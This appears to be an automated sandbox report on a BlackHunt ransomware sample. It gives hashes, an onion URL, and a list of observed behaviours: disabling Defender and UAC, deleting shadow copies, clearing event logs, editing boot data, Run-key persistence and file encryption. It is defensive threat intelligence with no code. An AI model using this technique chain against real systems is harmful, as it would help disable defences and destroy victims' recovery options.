Analysis
max time kernel: 179s
max time network: 207s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19/01/2024, 01:08
Static task: static1
Behavioral task: behavioral1
  Sample: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
  Resource: win10v2004-20231215-en
General
Target: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Size: 707KB
MD5: 31b37b83804d77f81c043d287a022572
SHA1: 3211a7e65f36760f1dd465bbb2452db1edea4f2e
SHA256: de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25
SHA512: 8832e70da76994483a124d9fdbab39d16279f4502f7878eee64c72452435da8428827a9a6097d40ac60269a942c8db25c31d450943c3cbd2c5dbd7dff60f6e21
SSDEEP: 6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza158Svnh:6uaTmkZJ+naie5OTamgEoKxLWc8h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures

Deletes NTFS Change Journal (2 TTPs, 2 IoCs)
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid | Process
5608 | fsutil.exe
2700 | fsutil.exe

description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | Conhost.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | Conhost.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe

Clears Windows event logs (1 TTP, 5 IoCs)
pid | Process
6060 | wevtutil.exe
3440 | wevtutil.exe
5384 | wevtutil.exe
3924 | wevtutil.exe
3464 | wevtutil.exe

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 4 IoCs)
pid | Process
5568 | bcdedit.exe
5576 | bcdedit.exe
732 | bcdedit.exe
416 | bcdedit.exe

Renames multiple (128) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

pid | Process
5552 | wbadmin.exe
2236 | wbadmin.exe

Disables Task Manager via registry modification

Disables use of System Restore points (1 TTP)
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation | cmd.exe

Adds Run key to start application (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" | reg.exe

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe

Enumerates connected drives (3 TTPs, 27 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
description | ioc | Process
File opened (read-only) | \??\E: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\B: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\F: | vssadmin.exe
File opened (read-only) | \??\R: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\I: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\O: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\H: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\M: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\T: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\U: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\K: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\V: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\P: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\A: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\L: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\N: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\Q: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\G: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\X: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\M: | fsutil.exe
File opened (read-only) | \??\F: | fsutil.exe
File opened (read-only) | \??\W: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\Y: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\S: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\J: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened (read-only) | \??\Z: | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
28 | ip-api.com

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Drops file in Program Files directory (64 IoCs)
description | ioc | Process
File created | C:\Program Files\Java\jdk-1.8\include\win32\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\lv.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\sk.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\cy.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\lib\images\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\cs.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\legal\javafx\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Google\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\mk.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\legal\javafx\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\dotnet\swidtag\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\it.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\include\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\dotnet\host\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\bin\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ta.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\tg.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\bin\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\fi.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\mng.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\bin\dtplugin\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\co.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\tr.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\lt.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\pl.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\include\win32\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\lib\ext\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\lib\images\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\hu.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\ka.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Google\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\hr.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\bin\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\tt.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\License.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\7-Zip\#BlackHunt_ReadMe.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\dotnet\shared\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\an.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\lij.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\Lang\kaa.txt | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\legal\jdk\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\7-Zip\Lang\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\7zCon.sfx | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File opened for modification | C:\Program Files\7-Zip\7-zip.chm | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.hta | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
File created | C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_Private.key | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoC)
pid | pid_target | Process | procid_target
268 | 5148 | WerFault.exe | 286

Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4984 | schtasks.exe

Interacts with shadow copies (2 TTPs, 6 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid | Process
3928 | vssadmin.exe
4588 | vssadmin.exe
1120 | vssadmin.exe
5540 | vssadmin.exe
1352 | vssadmin.exe
4064 | vssadmin.exe

Kills process with taskkill (1 IoC)
pid | Process
4892 | taskkill.exe

Modifies registry class (11 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2 | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon | reg.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Hunt2 | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000_Classes\Local Settings | cmd.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ | reg.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" | reg.exe

Runs ping.exe (1 TTP, 1 IoC)
pid | Process
5456 | PING.EXE

Suspicious behavior: GetForegroundWindowSpam (1 IoC)
pid | Process
4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Suspicious use of AdjustPrivilegeToken (24 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Token: SeRestorePrivilege | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Token: SeBackupPrivilege | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Token: SeTakeOwnershipPrivilege | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Token: SeAuditPrivilege | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Token: SeSecurityPrivilege | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Token: SeIncBasePriorityPrivilege | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe
Token: SeBackupPrivilege | 5496 | vssvc.exe
Token: SeRestorePrivilege | 5496 | vssvc.exe
Token: SeAuditPrivilege | 5496 | vssvc.exe
Token: SeBackupPrivilege | 408 | wbengine.exe
Token: SeRestorePrivilege | 408 | wbengine.exe
Token: SeSecurityPrivilege | 408 | wbengine.exe
Token: SeSecurityPrivilege | 3440 | wevtutil.exe
Token: SeBackupPrivilege | 3440 | wevtutil.exe
Token: SeSecurityPrivilege | 6060 | wevtutil.exe
Token: SeBackupPrivilege | 6060 | wevtutil.exe
Token: SeSecurityPrivilege | 5384 | wevtutil.exe
Token: SeBackupPrivilege | 5384 | wevtutil.exe
Token: SeSecurityPrivilege | 3924 | wevtutil.exe
Token: SeBackupPrivilege | 3924 | wevtutil.exe
Token: SeSecurityPrivilege | 3464 | wevtutil.exe
Token: SeBackupPrivilege | 3464 | wevtutil.exe
Token: SeDebugPrivilege | 4892 | taskkill.exe
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | Process | procid_target
PID 4276 wrote to memory of 4852 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 91
PID 4276 wrote to memory of 4852 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 91
PID 4276 wrote to memory of 3972 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 93
PID 4276 wrote to memory of 3972 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 93
PID 4276 wrote to memory of 5016 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 95
PID 4276 wrote to memory of 5016 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 95
PID 4276 wrote to memory of 1236 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 97
PID 4276 wrote to memory of 1236 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 97
PID 4276 wrote to memory of 3420 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 99
PID 4276 wrote to memory of 3420 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 99
PID 4852 wrote to memory of 1116 | 4852 | cmd.exe | 101
PID 4852 wrote to memory of 1116 | 4852 | cmd.exe | 101
PID 1236 wrote to memory of 2320 | 1236 | cmd.exe | 102
PID 1236 wrote to memory of 2320 | 1236 | cmd.exe | 102
PID 5016 wrote to memory of 3708 | 5016 | cmd.exe | 103
PID 5016 wrote to memory of 3708 | 5016 | cmd.exe | 103
PID 3420 wrote to memory of 1068 | 3420 | Process not Found | 105
PID 3420 wrote to memory of 1068 | 3420 | Process not Found | 105
PID 4276 wrote to memory of 1040 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 106
PID 4276 wrote to memory of 1040 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 106
PID 3972 wrote to memory of 3636 | 3972 | cmd.exe | 104
PID 3972 wrote to memory of 3636 | 3972 | cmd.exe | 104
PID 4276 wrote to memory of 4720 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 108
PID 4276 wrote to memory of 4720 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 108
PID 4276 wrote to memory of 2888 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 109
PID 4276 wrote to memory of 2888 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 109
PID 4276 wrote to memory of 4456 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 111
PID 4276 wrote to memory of 4456 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 111
PID 4276 wrote to memory of 3140 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 114
PID 4276 wrote to memory of 3140 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 114
PID 4276 wrote to memory of 2384 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 120
PID 4276 wrote to memory of 2384 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 120
PID 4276 wrote to memory of 3184 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 116
PID 4276 wrote to memory of 3184 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 116
PID 1040 wrote to memory of 1988 | 1040 | cmd.exe | 119
PID 1040 wrote to memory of 1988 | 1040 | cmd.exe | 119
PID 4276 wrote to memory of 4380 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 121
PID 4276 wrote to memory of 4380 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 121
PID 4720 wrote to memory of 3372 | 4720 | cmd.exe | 188
PID 4720 wrote to memory of 3372 | 4720 | cmd.exe | 188
PID 4456 wrote to memory of 3696 | 4456 | cmd.exe | 124
PID 4456 wrote to memory of 3696 | 4456 | cmd.exe | 124
PID 4276 wrote to memory of 4520 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 125
PID 4276 wrote to memory of 4520 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 125
PID 4276 wrote to memory of 3528 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 127
PID 4276 wrote to memory of 3528 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 127
PID 2888 wrote to memory of 3200 | 2888 | cmd.exe | 129
PID 2888 wrote to memory of 3200 | 2888 | cmd.exe | 129
PID 2384 wrote to memory of 4876 | 2384 | cmd.exe | 130
PID 2384 wrote to memory of 4876 | 2384 | cmd.exe | 130
PID 4276 wrote to memory of 2024 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 134
PID 4276 wrote to memory of 2024 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 134
PID 3184 wrote to memory of 4348 | 3184 | cmd.exe | 131
PID 3184 wrote to memory of 4348 | 3184 | cmd.exe | 131
PID 4276 wrote to memory of 1840 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 132
PID 4276 wrote to memory of 1840 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 132
PID 4276 wrote to memory of 3556 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 137
PID 4276 wrote to memory of 3556 | 4276 | de71678a5d247feea8d9145bb835c0cb1e12e9133c5d5fec7295b7198d85fa25.exe | 137
PID 3140 wrote to memory of 4388 | 3140 | cmd.exe | 136
PID 3140 wrote to memory of 4388 | 3140 | cmd.exe | 136
PID 4380 wrote to memory of 3652 | 4380 | cmd.exe | 138
PID 4380 wrote to memory of 3652 | 4380 | cmd.exe | 138
